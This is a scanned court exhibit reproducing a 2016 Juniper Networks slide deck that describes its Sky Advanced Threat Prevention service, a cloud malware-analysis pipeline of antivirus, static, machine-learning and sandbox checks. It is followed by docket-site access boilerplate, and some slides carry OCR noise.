Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 1 of 23
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 1 of 23
`
`
`
`
`
`EXHIBIT 5
`EXHIBIT 5
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 1 of 23
`
`
`
`
`
`EXHIBIT 5
`EXHIBIT 5
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 2 of 23
`
`enlene
`
`Santanu Ganguly <santanu@juniper.net>
`
`| .LAR N——.
`oky ATP Advanced Threat protectic
`Juniper’s Sky IS the limit!
`
`Juniper Networks, April 2016
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 3 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 3 of 23
`
`An Evolving Threat Landscape
`
`New actors, new threats, and new technologies means the threat
`landscapeis constantly evolving.
`
`¢ State sponsored actors and targeted attacks change the landscape
`e Attackers are constantly looking for, and finding, new vectors
`¢ Security solutions need to be agile to keep up
`¢ The impact of security breaches can't be understated
`
`The Head of CyberofBritish Intelligence, in his first public, yet anonymous
`interview stated: “There are nowthree certainties in life: there's death, there's
`taxes and there's a foreign intelligence service on your system."
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 4 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 4 of 23
`
`Impact of security breaches:
`Target breach (2013)
`
`Target Stolen Data: 110M Records
`
`
`
`PonemonInstitute:
`Average breach costs $214 per record stolen
`
`
`
`eoy
`W.
`y ;
`
`Rrlorenieetienn
`progress, lost customers
`
`Cost ofthe breach:
`* Gross expense of $191M
`* Net cost of $162M
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 5 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 5 of 23
`
`Current solutionsfail to protect
`organizations fromsophisticated, evasive
`eae)
`
`Sky Advanced Threat Prevention to the Rescue n
`
`Simple Threats
`
`Sophisticated Threats
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 6 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 6 of 23
`
`What is Sky Advanced Threat Prevention
`
`x
`i Sky ATP
`2 C A 1https://amer.skyjunipersecurity.net
`= ad
`
` c
`
`inet
`
`Wikeigy
`
`foue Lotabom ieCotegorAaere ie Cores
`
`
`
`CHC Sever & Uaeere
`Ti
`Coros med
`we erty
`Be ietected
`Scanned
`——e
`—
`=
`=.
`“| a
`es
`ee
`=
`=
`ros
`— =
`ae
`=
`=
`
`Threat Count
`
`
`
`—— TT
`
`Copyright © 2016 Juniper Networks, Inc
`
`€
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 7 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 7 of 23
`
`Why Cloud?
`
`¢ Cloud environmentsare flexible and massively scalable
`¢ Ashared platform means everyone benefits from new threat
`intelligence in near real-time
`¢ Security developers can update their defenses as new attack
`techniques cometolight, with no delayto distribute the threat
`intel.
`¢ On-site platforms offer lower efficiency, scalability, efficacy
`and agility.
`The connection between the SRX and the Cloud is encrypted. Customer data exported to the Cloud is destroyed after analysis. Customer data is isolated to ensure privacy.
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 8 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 8 of 23
`
`oky Advanced Threat Prevention Architecture:
`Sky components are divided between the SRX, embeddedin Junos,
`and the cloud
`
`¢ Components in Junos:
`— Secintel Service
`
`* Receives feeds from the cloud
`
`— GeolP
`
`— Command and Control
`
`— Infected Hosts
`— Sky ATP Service
`« Passes incomingfiles to the Cloud for analysis
`¢ Enforces policies based on Cloud verdicts
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 9 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 9 of 23
`
`sky Advanced Threat Prevention Architecture:
`Sky components are divided between the SRX, embeddedin Junos,
`and the cloud
`
`¢ Components in the Cloud:
`— Analytics
`¢ Malware analysis pipeline
`¢ C&C / Malware Event correlation
`
`— Threat feeds
`
`* Cascade — generating the C&C Feed
`¢ GeolP — externally sourced
`¢ Infected Hosts — Generated by event correlation
`— Management
`¢ Web UI for all your management love and affection
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 10 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 10 of 23
`
`oky Advanced Threat Prevention
`Infected Hosts:
`
`The Infected Hosts feed allows automated
`quarantining and active responsesto internal
`threats. This is an “Event Driven’ feed, created
`in the Cloud based on what's actively
`happening on a protected network.
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 11 of 23
`
`
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 12 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 12 of 23
`
`Sky Advanced Threat Prevention
`Use Cases
`
`Use casesacross the deployment
`spectrum of SRX
`
`A. CampusEdgeFirewall
`¢
`Protection of end user
`devices from files
`downloaded from the
`Internet
`
`a
`
`|
`
`|
`
`Data Center
` B. Branch Router
`
`¢ Protection for split-tunnel
`deployments
`
`C. Data Center Edge
`¢ Application protection
`from infectedfiles
`
`Campus Locations
`
`Copyright © 2016 Juniper Networks,Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 13 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 13 of 23
`
`Sky Advanced Threat Prevention in action
`
`
`
`
`Spotlight Secure Cloud Service
`
`
` Malware Inspection Pipeline
`
`Feed Analysis & Efficacy
`
`Sky ATP Secure Cloud Service
`
`j
`
`Dynamic
`
`Internal Compromise Detection
`eS ee a
`Identified
`C&C
`Analvti
`Malware
`AVA=1O)
`Pe Ae
`
`Web-based Service Portal
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 14 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 14 of 23
`
`The ATP verdict chain
`Staged analysis: combining rapid response and deepanalysis
`
`saat
`
`Suspectfiles enter the analysis chain in the cloud
`
`Cache lookup: (~1 second)
`Files we’ve seen before are identified and a verdict immediately goes back to SRX
`
`Anti-virus scanning: (~5 second)
`Multiple AV enginesto return a verdict, which is then cachedfor future reference
`
`Static analysis: (~30 second)
`Thestatic analysis engine does a deeperinspection, with the verdict again cached
`for future reference
`
`Dynamic analysis: (~7 minutes)
`Dynamic analysis in a custom sandbox leverages deception and provocation
`techniquesto identify evasive malware
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 15 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 15 of 23
`
`Anti-Virus: First Pass
`
`* Overcoming False Positives (FP) and False Negatives (FN)
`* Use multiple AV engines
`* Combine with Machine Learning
`
`Seee E>
`Anti-virus Client #2
`==>
`Anti-virus Client #3
`==>
`
`=>
`===> oe =» Verdict
`
`==>
`
`ele!
`
`.
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 16 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 16 of 23
`
`Static Analysis: Pulling apart the code
`
`aa
`j
`
`¢ Break file down into features
`
`¢ File structure
`* Meta info (file name, vendor, etc...)
`* Categories of instructions used
`* File entropy
`* Etc.
`
`)=|7
`
`74]
`©Oo
`
`PCIE)
`ile)PelaP
`OSMkyAt
`
`.2
`
`¢ Feed features into machine learning algo
`¢ First teach it what malware looks like
`
`* Thenask if something is malware
`
`Static analysis is traditionally done with rules. Argon extends
`this by adding machine learning to improve verdict accuracy.
`
`J
`
`Verdict
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 17 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 17 of 23
`
`Dynamic Analysis: Sandboxing
`Inside a custom Sandbox environment
`
`i
`
`.
`
`|
`
`cm
`
`¢ Generate a verdict with Machine Learning vmware
`
`¢ Spool up a live desktop
`¢ Hook into the OS to record everything
`¢ Upload and execute the suspectfile
`¢ Apply Sky’s Deception and Provocation Techniques
`* The full run takes approximately 7 minutes
`¢ Download the activity recording for analysis
`¢ Tear downthelive desktop
`
`At release: Windows 7
`Future: Windows8, 10, Android, Linux, other.
`
`a
`af
`
`a
`oad
`
`Windows*® Windows’ /
`es Windows8
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 18 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 18 of 23
`
`sandboxing: Behavioral Analysis
`
`Behavior analysis gives us a better understanding of what a suspect
`file is trying to do. Some behaviors are usually considered benign,
`while others may be benign, but are also seen in malicious programs.
`Still others are usually associated with attack behaviors. Some
`examples:
`
`° Ex@atdtoméiosieene espiog directory
`hteeeeRGepataMOttosackANGtist
`
`Copyright ©2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 19 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 19 of 23
`
`Machine Learning
`Digging through massivepiles of data:
`letting machines do what machines do
`
`best
`
`
`
`— ¢ Compare a new
`n” to see howcloselyit —
`amples
`
`—
`
`Ps festa
`nn
`8
`
`este
`pc“
`nor EX cl
`RL!
`
`t
`
`resembles good
`
`Weelfimel veedichis digseithonsttowi draGbaaunewebtanipixkireserniblesthedmotvn
`gaonleskcksamplesodsy eonpaong any’ featunetescrdséslanigesdatacsaiiqnevior
`campelivey weky @cousatepiesults.
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 20 of 23
`
`
`
`Copyright © 2016 Juniper Networks,Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 21 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 21 of 23
`
`How is Sky ATP Different?
`
`¢ High Efficacy, Scalable and Tightly integrated solution
`¢ Distributed sensing and enforcement on SRX (no additional sensors)
`¢ Actionable Intelligence
`¢
`In-line blocking to prevent zero-day infections from getting in
`¢ Unique deception & provocation techniques to counter evasive threats
`¢ Advanced machine learning
`¢ Support for different types of analysis targets
`¢ Multi-platform executable and application support
`¢ Exploits and malicious content embedded in documents (MS Office, PDF)
`¢ Dangerous web applications (Java, Flash) — future
`¢ Cost-effective, non-intrusive solution with full network coverage
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 22 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 22 of 23
`
`Summary
`Leveraging the Cloud to provide efficacy and agility
`
`
`
`Copyright © 2016 Juniper Networks, Inc
`
`
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 23 of 23
`
`Case 3:17-cv-05659-WHA Document 480-6 Filed 05/16/19 Page 23 of 23
`
`JunIPer
`
`NETWORKS Thank You!
`
`
`
`
Accessing this document will incur an additional charge of $.
After purchase, you can access this document again without charge.
Accept $ Charge
Still Working On It
This document is taking longer than usual to download. This can happen if we need to contact the court directly to obtain the document and their servers are running slowly.
Give it another minute or two to complete, and then try the refresh button.
A few More Minutes ... Still Working
It can take up to 5 minutes for us to download a document if the court servers are running slowly.
Thank you for your continued patience.
This document could not be displayed.
We could not find this document within its docket. Please go back to the docket page and check the link. If that does not work, go back to the docket and refresh it to pull the newest information.
Your account does not support viewing this document.
You need a Paid Account to view this document. Click here to change your account type.
Your account does not support viewing this document.
Set your membership
status to view this document.
With a Docket Alarm membership, you'll
get a whole lot more, including:
- Up-to-date information for this case.
- Email alerts whenever there is an update.
- Full text search for other cases.
- Get email alerts whenever a new case matches your search.
One Moment Please
The filing “” is large (MB) and is being downloaded.
Please refresh this page in a few minutes to see if the filing has been downloaded. The filing will also be emailed to you when the download completes.
Your document is on its way!
If you do not receive the document in five minutes, contact support at support@docketalarm.com.
Sealed Document
We are unable to display this document, it may be under a court ordered seal.
If you have proper credentials to access the file, you may proceed directly to the court's system using your government issued username and password.
Access Government Site
